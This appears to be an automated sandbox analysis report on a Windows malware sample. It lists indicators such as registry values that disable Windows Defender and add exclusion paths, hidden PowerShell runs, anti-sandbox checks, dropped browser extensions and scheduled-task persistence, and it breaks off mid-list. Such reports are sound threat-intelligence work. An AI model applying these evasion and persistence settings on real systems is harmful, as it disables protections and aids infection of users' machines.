Analysis
-
max time kernel
216s -
max time network
218s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
30/05/2024, 22:58
Static task
static1
Behavioral task
behavioral1
Sample
599a8c2c177f0d468cb20ef6e6b2164914461ca2daa3a502ce5654ac06263497.exe
Resource
win7-20240221-en
General
-
Target
599a8c2c177f0d468cb20ef6e6b2164914461ca2daa3a502ce5654ac06263497.exe
-
Size
7.3MB
-
MD5
0c382059d2f9be5e147cc2cf5cd2a88b
-
SHA1
08476a90aa9e389d385b7239b80c559ac7315055
-
SHA256
599a8c2c177f0d468cb20ef6e6b2164914461ca2daa3a502ce5654ac06263497
-
SHA512
0470275935f184171529a6a091cc9d3e28232baa2a73778468ab0428a5a796cb89269fbfc50f651da708855d26d293dc67509c5e3a7cb03e6d48520948c870eb
-
SSDEEP
196608:91OROmYdad3DQWZh59E3kz/iyq9DJMeK+xvxeV8IxJ4jl:3ORtYEd3DpXPPJ4JM83OJS
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\mEGqyDDrClrU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\YlnHzqqXEaDDC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\dpqkkcpFfSkFLMBpv = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\WVfXyuxDIVBpwENO = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\DxTzxYfmrcUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\DxTzxYfmrcUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\iEBFdPsJPxYkyqxDvdR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\WVfXyuxDIVBpwENO = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\HgpwBMHPU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\nbVAllIPPGDxfqVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\YlnHzqqXEaDDC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\iEBFdPsJPxYkyqxDvdR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\mEGqyDDrClrU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\nbVAllIPPGDxfqVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\dpqkkcpFfSkFLMBpv = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\WVfXyuxDIVBpwENO = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\HgpwBMHPU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\WVfXyuxDIVBpwENO = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 24 1628 rundll32.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs
Run Powershell and hide display window.
pid Process 2372 powershell.exe 2304 powershell.EXE 2688 powershell.EXE 1700 powershell.exe 2020 powershell.exe 2520 powershell.exe 296 powershell.exe 2076 powershell.exe 2436 powershell.exe 272 powershell.EXE -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Control Panel\International\Geo\Nation zxZiGnQ.exe -
Executes dropped EXE 4 IoCs
pid Process 1996 Install.exe 1980 Install.exe 2292 qTTbifu.exe 2208 zxZiGnQ.exe -
Loads dropped DLL 23 IoCs
pid Process 2972 599a8c2c177f0d468cb20ef6e6b2164914461ca2daa3a502ce5654ac06263497.exe 1996 Install.exe 1996 Install.exe 1996 Install.exe 1996 Install.exe 1980 Install.exe 1980 Install.exe 1980 Install.exe 2032 WerFault.exe 2032 WerFault.exe 2032 WerFault.exe 1628 rundll32.exe 1628 rundll32.exe 1628 rundll32.exe 1628 rundll32.exe 1860 WerFault.exe 1860 WerFault.exe 1860 WerFault.exe 1860 WerFault.exe 1860 WerFault.exe 1716 WerFault.exe 1716 WerFault.exe 1716 WerFault.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json zxZiGnQ.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json zxZiGnQ.exe -
Drops file in System32 directory 27 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat zxZiGnQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA zxZiGnQ.exe File created C:\Windows\system32\GroupPolicy\gpt.ini qTTbifu.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA zxZiGnQ.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_242CEA72AD255CEF17D8B88AD3038326 zxZiGnQ.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol qTTbifu.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA zxZiGnQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_05B056B983E25E9B4D43BC3D9283D686 zxZiGnQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_05B056B983E25E9B4D43BC3D9283D686 zxZiGnQ.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol zxZiGnQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rundll32.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_242CEA72AD255CEF17D8B88AD3038326 zxZiGnQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_91E41FAE8B0B67645773C1C9A8DB10E4 zxZiGnQ.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol qTTbifu.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini qTTbifu.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA zxZiGnQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_91E41FAE8B0B67645773C1C9A8DB10E4 zxZiGnQ.exe -
Drops file in Program Files directory 13 IoCs
description ioc Process File created C:\Program Files (x86)\HgpwBMHPU\COfvpu.dll zxZiGnQ.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi zxZiGnQ.exe File created C:\Program Files (x86)\iEBFdPsJPxYkyqxDvdR\KMWzkhj.dll zxZiGnQ.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi zxZiGnQ.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja zxZiGnQ.exe File created C:\Program Files (x86)\iEBFdPsJPxYkyqxDvdR\wTVytBH.xml zxZiGnQ.exe File created C:\Program Files (x86)\mEGqyDDrClrU2\nfXTtkM.xml zxZiGnQ.exe File created C:\Program Files (x86)\YlnHzqqXEaDDC\bVvJCXS.dll zxZiGnQ.exe File created C:\Program Files (x86)\YlnHzqqXEaDDC\jXUHbBl.xml zxZiGnQ.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak zxZiGnQ.exe File created C:\Program Files (x86)\HgpwBMHPU\TTGrYDp.xml zxZiGnQ.exe File created C:\Program Files (x86)\mEGqyDDrClrU2\fCdOqfgvapiuW.dll zxZiGnQ.exe File created C:\Program Files (x86)\DxTzxYfmrcUn\nwRjOBI.dll zxZiGnQ.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\UrAvajSMMGVpQVJ.job schtasks.exe File created C:\Windows\Tasks\gADrqfoWgJsmHNhuI.job schtasks.exe File created C:\Windows\Tasks\bxFWqzBdxtvvQVHpdf.job schtasks.exe File created C:\Windows\Tasks\gcuowESrCqkxPIacf.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
pid pid_target Process procid_target 2032 2292 WerFault.exe 62 1860 1980 WerFault.exe 29 1716 2208 WerFault.exe 227 -
Creates scheduled task(s) 1 TTPs 12 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1468 schtasks.exe 1624 schtasks.exe 1632 schtasks.exe 2904 schtasks.exe 1700 schtasks.exe 2352 schtasks.exe 1204 schtasks.exe 1492 schtasks.exe 2980 schtasks.exe 1408 schtasks.exe 836 schtasks.exe 1380 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 zxZiGnQ.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{39FFD7B2-9DA2-4408-9725-386077F80865}\WpadDecision = "0" zxZiGnQ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs zxZiGnQ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates zxZiGnQ.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\12-e8-0c-d8-7f-16\WpadDecisionReason = "1" zxZiGnQ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs zxZiGnQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad zxZiGnQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My zxZiGnQ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs zxZiGnQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople zxZiGnQ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs zxZiGnQ.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\12-e8-0c-d8-7f-16\WpadDecision = "0" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 zxZiGnQ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs zxZiGnQ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs zxZiGnQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing zxZiGnQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust zxZiGnQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix zxZiGnQ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates zxZiGnQ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates zxZiGnQ.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\12-e8-0c-d8-7f-16\WpadDecisionReason = "1" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ zxZiGnQ.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{39FFD7B2-9DA2-4408-9725-386077F80865}\WpadNetworkName = "Network 3" zxZiGnQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople zxZiGnQ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings wscript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" zxZiGnQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA zxZiGnQ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs zxZiGnQ.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings wscript.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 zxZiGnQ.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0107000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 zxZiGnQ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs zxZiGnQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ qTTbifu.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates zxZiGnQ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs zxZiGnQ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates zxZiGnQ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs zxZiGnQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached qTTbifu.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed zxZiGnQ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates zxZiGnQ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed zxZiGnQ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates zxZiGnQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" zxZiGnQ.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" qTTbifu.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 900224f3e4b2da01 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" zxZiGnQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings zxZiGnQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs zxZiGnQ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs zxZiGnQ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{39FFD7B2-9DA2-4408-9725-386077F80865}\12-e8-0c-d8-7f-16 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA zxZiGnQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot zxZiGnQ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs zxZiGnQ.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\12-e8-0c-d8-7f-16\WpadDetectedUrl rundll32.exe -
Suspicious behavior: EnumeratesProcesses 39 IoCs
pid Process 2372 powershell.exe 2372 powershell.exe 2372 powershell.exe 296 powershell.exe 2076 powershell.exe 2076 powershell.exe 2076 powershell.exe 2304 powershell.EXE 2304 powershell.EXE 2304 powershell.EXE 2688 powershell.EXE 2688 powershell.EXE 2688 powershell.EXE 2436 powershell.exe 272 powershell.EXE 272 powershell.EXE 272 powershell.EXE 1700 powershell.exe 1700 powershell.exe 1700 powershell.exe 2208 zxZiGnQ.exe 2208 zxZiGnQ.exe 2208 zxZiGnQ.exe 2208 zxZiGnQ.exe 2208 zxZiGnQ.exe 2208 zxZiGnQ.exe 2208 zxZiGnQ.exe 2208 zxZiGnQ.exe 2020 powershell.exe 2520 powershell.exe 2208 zxZiGnQ.exe 2208 zxZiGnQ.exe 2208 zxZiGnQ.exe 2208 zxZiGnQ.exe 2208 zxZiGnQ.exe 2208 zxZiGnQ.exe 2208 zxZiGnQ.exe 2208 zxZiGnQ.exe 2208 zxZiGnQ.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2372 powershell.exe Token: SeDebugPrivilege 296 powershell.exe Token: SeIncreaseQuotaPrivilege 2120 WMIC.exe Token: SeSecurityPrivilege 2120 WMIC.exe Token: SeTakeOwnershipPrivilege 2120 WMIC.exe Token: SeLoadDriverPrivilege 2120 WMIC.exe Token: SeSystemProfilePrivilege 2120 WMIC.exe Token: SeSystemtimePrivilege 2120 WMIC.exe Token: SeProfSingleProcessPrivilege 2120 WMIC.exe Token: SeIncBasePriorityPrivilege 2120 WMIC.exe Token: SeCreatePagefilePrivilege 2120 WMIC.exe Token: SeBackupPrivilege 2120 WMIC.exe Token: SeRestorePrivilege 2120 WMIC.exe Token: SeShutdownPrivilege 2120 WMIC.exe Token: SeDebugPrivilege 2120 WMIC.exe Token: SeSystemEnvironmentPrivilege 2120 WMIC.exe Token: SeRemoteShutdownPrivilege 2120 WMIC.exe Token: SeUndockPrivilege 2120 WMIC.exe Token: SeManageVolumePrivilege 2120 WMIC.exe Token: 33 2120 WMIC.exe Token: 34 2120 WMIC.exe Token: 35 2120 WMIC.exe Token: SeDebugPrivilege 2076 powershell.exe Token: SeDebugPrivilege 2304 powershell.EXE Token: SeDebugPrivilege 2688 powershell.EXE Token: SeDebugPrivilege 2436 powershell.exe Token: SeAssignPrimaryTokenPrivilege 2724 WMIC.exe Token: SeIncreaseQuotaPrivilege 2724 WMIC.exe Token: SeSecurityPrivilege 2724 WMIC.exe Token: SeTakeOwnershipPrivilege 2724 WMIC.exe Token: SeLoadDriverPrivilege 2724 WMIC.exe Token: SeSystemtimePrivilege 2724 WMIC.exe Token: SeBackupPrivilege 2724 WMIC.exe Token: SeRestorePrivilege 2724 WMIC.exe Token: SeShutdownPrivilege 2724 WMIC.exe Token: SeSystemEnvironmentPrivilege 2724 WMIC.exe Token: SeUndockPrivilege 2724 WMIC.exe Token: SeManageVolumePrivilege 2724 WMIC.exe Token: SeDebugPrivilege 272 powershell.EXE Token: 